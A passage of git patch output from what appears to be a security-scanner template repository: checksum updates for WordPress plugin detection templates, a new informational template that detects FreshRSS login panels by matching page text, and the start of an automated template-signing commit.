+http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:d59444a33c177c82fc542b17cc5c5a6d1de898cd -http/technologies/wordpress/plugins/pixelyoursite.yaml:b1a1707e9ea73fa3c815ec7425d3b8fcf1b1eadd -http/technologies/wordpress/plugins/polylang.yaml:474b86b03c47fd6c71387ac75a57f2605561c588 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:3ed0cb4e0842445653d4b6f4284f9cab51b337cd -http/technologies/wordpress/plugins/post-smtp.yaml:5c180878d4a566d9e35f49d47fa1a32e298f1db3 -http/technologies/wordpress/plugins/post-types-order.yaml:46ff92ab4c3b0f3f882b4cde5f4482af345d0165 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:72ec0fb4c2b0495c6a85806bbd7a41cf570e5ba5 -http/technologies/wordpress/plugins/pretty-link.yaml:7d2595787ef71bfc0f8263b352950574c82afbbd -http/technologies/wordpress/plugins/really-simple-captcha.yaml:820fb389b06874e8609b9cb97946e84ba0d4990e -http/technologies/wordpress/plugins/really-simple-ssl.yaml:ea5b1a5d00a1bfe9040eb5a23dc864d6b4c00e5d -http/technologies/wordpress/plugins/redirection.yaml:86f2c0d6ee7b8f4be33b172415d121cca0c0fc48 -http/technologies/wordpress/plugins/redux-framework.yaml:77d5d95bf85d6717e879e204e15bd12328af0772 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:911acc0810788cbded5214fe73d71c572cf101ed -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:be3e61e48eb34279bbe7c84eb013417222c2b5e8 -http/technologies/wordpress/plugins/safe-svg.yaml:a210a5588617bc1fa9dee29779b886e3e8effe4c -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:9daa6afe994199102a2d27647f7289e5a75e937d -http/technologies/wordpress/plugins/sg-cachepress.yaml:cfbfebaa8032cc1cc442bcef45c6fcb738d991ff -http/technologies/wordpress/plugins/sg-security.yaml:67b421bf7f537d741b6498008b25f145905b409b -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:909597cab42dda480c2b8f6bcfb93b776ceb071f -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:eb62954c099fd040e0a841a6763895bf70af5155 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:7621180c487cc3140d4025a0d41b3f8a2d50b60a -http/technologies/wordpress/plugins/simple-history.yaml:f28952411d1d06b36dff1dd3ad2f0977ced41299 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:e2ee08639c89ccd9bce93751a2af5f0811625b00 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:d8b01acbb97663782bb2dcedfe15120cc436e270 -http/technologies/wordpress/plugins/smart-slider-3.yaml:273c9034d34b21bd24dfaeb4cfbb50f261c8ec35 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:ec9b1dd5baadb957a5024484538a923d3fbfd8b1 +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:b4be0a274e0e8f4d23826d09d4bd337e7e121295 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:349a5a2836a67e5aeeca8ef1fef577003e16c12b -http/technologies/wordpress/plugins/sucuri-scanner.yaml:2d32a809cfdaf412a4ff8847d5f0b24896f2166a +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:7838667e6eaf29a7718aa4a3007acc7b19326275 -http/technologies/wordpress/plugins/tablepress.yaml:a59b63b077703bae19256601e2f054fd3ab88c05 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a5ee503fc1ce460363d66fd08627a5aab79e0efd -http/technologies/wordpress/plugins/templately.yaml:2db3b797ef0a62165f2c311073ece669e135c8c4 -http/technologies/wordpress/plugins/the-events-calendar.yaml:1445a9f55118fc7c160041892f8d57d1c18a55f8 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:b0d6964edb54e6bfcf5592e4a6c554a6dc3994bb -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97fd1f5f89ad4326876884779c11ac25c36d2956 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:0040d3f036440bec9a35e0417734d55766c9434b -http/technologies/wordpress/plugins/under-construction-page.yaml:d43fc2fb8627533a49d8b2c2da77fd540534ff41 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:cbc91cf7ce469434f73d844364722b875291b2d3 +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:d14c554fb8aa859859b95246765c241b76449e8c +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:6ad4f075c3b11ab9ab8ab22afb12916cb1ac85a1 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:182dff70a183be1ce58d398f325dce067a7be421 -http/technologies/wordpress/plugins/webp-express.yaml:d96dbe01868e7f6c294a7f0ef5f9a06ca937019a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:bd4413b1636802ae18dfa8fb311c28c6aea1f578 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:196218a0da05878689fd400af5eb4e4d8539d8cc -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0cf0f384811980e615be535800d170a87db872bd -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:1f65c870b9f2f91a951f70ade0312a0cfab1661a +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:1afc52f929ec9582fb3278094f229c10bc4bbfe5 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:8f22f2db9650e88efaf2fc5981be84e768ece1de -http/technologies/wordpress/plugins/woocommerce-payments.yaml:fd658cedd8cf8a63c2dd7ed0f27256609501a08b -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:7dbfcf09843dfc1877ff29ffeef7a40dc6fecc5a -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:e9d8fc04347388ee797bb3ee322f01f3530a700a -http/technologies/wordpress/plugins/woocommerce-services.yaml:4f1f3b1eb1de8b786c2703f924c6ab5d7a0c7589 -http/technologies/wordpress/plugins/woocommerce.yaml:60a184c63a41e4dc512c1da9ff3735ab605dad61 -http/technologies/wordpress/plugins/wordfence.yaml:2738513fb3811d043d0cedcd96829f663eab94e7 -http/technologies/wordpress/plugins/wordpress-importer.yaml:0212f60dbff855eae87944cc3c4f83bd27585c43 -http/technologies/wordpress/plugins/wordpress-seo.yaml:e5c7f6f2aecddb9fe6241a41b962188d453d6f97 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:54ca4f53e69168d17b1df9256f30d09055ea79bd -http/technologies/wordpress/plugins/wp-crontrol.yaml:a819e65274a3de58b05ab005431f3e918bc22962 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8217364e18e66f7ce3a4fa77d099eb35fe039330 -http/technologies/wordpress/plugins/wp-file-manager.yaml:3272d9107223b4e01fa7506d51d78da565bbc833 -http/technologies/wordpress/plugins/wp-google-maps.yaml:bde2b1813974517a05a2fad0e82af9944261b63c -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:4570f87f20178bcd3e02c8c5891f33acee857006 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:3e623bc7c56701d405692a8ed5e861c8c2cd5b95 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:f4dbb7e61a436a4da4134dc2d868c6915331dcd1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:2393cc8bc78037fbc8167c2438ae7a63d0a9d637 -http/technologies/wordpress/plugins/wp-optimize.yaml:f7984b59e04a45299bba6b33f5b37bad3fc66b72 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:3edd03c615851555bb2b084e4dbed8a06a890e9e -http/technologies/wordpress/plugins/wp-reset.yaml:33a0ae96e4ad9cfbbe07d9a155dbe09016eabe76 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:e9768ac87eb7db331577151f493cf2319b2769bd -http/technologies/wordpress/plugins/wp-rollback.yaml:cb17d5ebe6a8dcaba932c945aacb90479feb3f97 -http/technologies/wordpress/plugins/wp-seopress.yaml:f770591280993a565f19a40f1007b1238b0d0386 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:b68110c8120d21e32f19068852501e00b675d5bb -http/technologies/wordpress/plugins/wp-smushit.yaml:76a39dc9526ba71cf5d38d5128b3bd15caaa7484 -http/technologies/wordpress/plugins/wp-statistics.yaml:7b70469b68973f20bca95a7df4648adeaf678e52 -http/technologies/wordpress/plugins/wp-super-cache.yaml:a4cc188458f26ccb496e108f106caccd85f54edd +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:68c90673d799faf2f3942d0f3738503d3ba71fac -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:840b896ad7646bc99ec66fbb0814038cd2849a52 -http/technologies/wordpress/plugins/wpforms-lite.yaml:a4e58c9002ad922e9d2def6996c08da1fa1ceb51 -http/technologies/wordpress/plugins/wps-hide-login.yaml:61957fd8a9885be1a9b55d5caf48be9db3766524 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:8ddfd01cdf4c89c955859cba4e134594d4eb1557 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e741854d5d621f89fe039b8fffb795b0ac2227c0 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8888,7 +8888,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5067d37937cbd0dcb92a50c936c1ef7f487a195d +templates-checksum.txt:56e17ebf679a9010efc0dc095d3324bbbbd8b8b2 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 591806bf31bea61b9effd61a3eb5628e88cf41ec Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 18 Jul 2024 10:02:10 +0530 Subject: [PATCH 1349/1841] Create freshrss-panel.yaml --- http/exposed-panels/freshrss-panel.yaml | 36 +++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 http/exposed-panels/freshrss-panel.yaml diff --git a/http/exposed-panels/freshrss-panel.yaml b/http/exposed-panels/freshrss-panel.yaml new file mode 100644 index 0000000000..b9cebb4ebd --- /dev/null +++ b/http/exposed-panels/freshrss-panel.yaml @@ -0,0 +1,36 @@ +id: freshrss-panel + +info: + name: Freshrss Panel - Detect + author: ritikchaddha + severity: info + description: | + Freshrss panel has been detected. + metadata: + max-request: 1 + verified: true + shodan-query: title:"Freshrss" + tags: freshrss,panel,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'content="FreshRSS' + - 'alt="FreshRSS' + - 'About FreshRSS' + - 'FreshRSS' + condition: or + + - type: status + status: + - 200 From 93643dd8d66bdf76a81a9dfacb248b7c46e7b105 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 18 Jul 2024 04:32:53 +0000 Subject: [PATCH 1350/1841] Auto Template Signing [Thu Jul 18 04:32:53 UTC 2024] :robot: --- http/cves/2024/CVE-2024-4577.yaml | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + 